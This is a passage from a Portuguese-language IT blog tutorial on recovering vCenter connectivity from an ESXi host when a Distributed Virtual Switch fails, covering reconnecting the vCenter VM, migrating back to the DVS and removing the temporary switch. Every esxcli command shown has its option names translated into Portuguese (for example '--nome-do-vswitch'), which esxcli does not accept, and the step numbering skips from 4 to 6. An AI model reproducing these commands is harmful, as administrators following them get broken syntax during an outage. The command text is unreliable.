# esxcli network vswitch standard uplink add --nome-da-uplink=vmnic --nome-do-vswitch=vSwitchName

Passo 3: Restaurar a Conectividade de Rede da Máquina Virtual do vCenter

Primeiro, vamos conectar a máquina virtual do vCenter ao novo Portgroup do Standard Switch. Isso ajudará a restaurar o acesso à rede do vCenter, permitindo que os ESXi se conectem novamente ao servidor vCenter e você possa gerenciar sua infraestrutura novamente.

  • Entre no cliente vSphere do ESXi com credenciais de administrador.
  • Vá para “Máquinas Virtuais”.
  • Selecione a máquina virtual do vCenter.
  • Clique em “Ações” > “Editar Configuração”.
  • Conecte o Adaptador de Rede 1 ao Portgroup recém-criado no Standard Switch.
  • Clique em Salvar.

Até este ponto, você deve ter recuperado a conectividade de rede do vCenter e agora deve conseguir se conectar ao cliente vSphere. Se ainda não conseguir, certifique-se de que o Portgroup do Standard Switch tenha as configurações corretas de VLAN e MTU.
Depois de verificar que tudo está em ordem no seu inventário de vCenter, migre o vCenter de volta para o DVS para que ele tenha a mesma configuração que antes da interrupção.

Passo 4: Migrar o vmnic de Volta para o DVS

  • Vá para “Máquinas Virtuais”.
  • Selecione a máquina virtual do vCenter.
  • Clique em “Ações” > “Editar Configuração”.
  • Altere o Adaptador de Rede 1 de volta para o grupo de portas DVS original.
  • Clique em Salvar.

Passo 6: Remover o Standard Switch e o Portgroup Temporário

Remova o Portgroup do Standard Switch:

# esxcli network vswitch standard portgroup remove --nome-do-portgroup=Nome-do-Portgroup --nome-do-vswitch=Nome-do-vswitch

Remova o Standard Switch:

# esxcli network vswitch standard remove --nome-do-vswitch=Nome-do-vswitch

Conclusão

Este processo permitirá que você se recupere de uma situação em que o vCenter perde a conectividade de rede devido a um problema com o Distributed Virtual Switch. É um processo delicado e você deve ter certeza de seguir cada passo cuidadosamente para evitar problemas maiores.
Lembre-se de que a melhor maneira de prevenir esse tipo de problema é configurar portas efémeras para a rede de gestão no seu ambiente DVS.

Espero que este guia seja útil e ajude você a recuperar sua infraestrutura VMware no caso de o vCenter perder a conectividade de rede.

Referências

https://kb.vmware.com/s/article/83906

La entrada Iniciar o vCenter com Conectividade a partir do ESX quando o DVS Não Está a Funcionar se publicó primero en Aprende IT.

]]>
https://aprendeit.com/pt/iniciar-o-vcenter-com-conectividade-a-partir-do-esx-quando-o-dvs-nao-esta-a-funcionar/feed/ 0